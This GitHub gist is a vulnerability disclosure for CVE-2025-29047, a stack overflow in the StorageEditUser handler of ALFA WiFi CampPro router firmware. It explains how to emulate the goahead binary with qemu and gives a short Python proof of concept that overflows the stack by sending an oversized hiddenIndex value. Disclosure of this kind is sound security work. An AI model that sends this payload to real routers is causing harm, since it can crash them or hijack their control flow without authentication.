Skip to content

Instantly share code, notes, and snippets.

@xyqer1

xyqer1/ALFA-WiFi-CampPro-StorageEditUser-hiddenIndex.md

Last active April 17, 2025 09:02
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save xyqer1/74adbc0249eeacf762fb4d33cf93a0f5 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save xyqer1/74adbc0249eeacf762fb4d33cf93a0f5 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
ALFA-WiFi-CampPro-StorageEditUser-hiddenIndex.md

ALFA WiFi CampPro-StorageEditUser-hiddenIndex

Vulnerability Details

  • Affected Firmware: ALFA_CAMPRO-co-2.29
  • CVE-ID: CVE-2025-29047
  • Root Cause: By analyzing the goahead file in the bin directory, I found that the function StorageEditUser contains a stack overflow vulnerability.
  • Impact: Remote unauthenticated attackers can hijack the program's control flow.

Vendor Information

During my internship at Qi An Xin Tiangong Lab, I discovered a stack overflow vulnerability in the ALFA WiFi CampPro router.

By analyzing the goahead file in the bin directory, I found that the function StorageEditUser contains a stack overflow vulnerability.

The stack overflow can be triggered by the hiddenIndex key value, which leads to a sprintf stack overflow.

image-20250306164106277

image-20250306164014463

How can we simulate a router

Use the following command to simulate with qemu-mipsel-static.

sudo qemu-mipsel-static -L ./ ./bin/goahead

The content of the poc.py file is as follows:

import requests
url = "http://127.0.0.1/goform/StorageEditUser"
data = {
        "hiddenIndex": "a"*0x100
}

res = requests.post(url,data=data)
print(res.text)

Attack result

image-20250306164205480

One can see that his stack space is 0x48.

image-20250306163857916

After execution, it overflows to 0x0x128. If you want to overflow more, you can modify the hiddenIndex skey value in the code.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment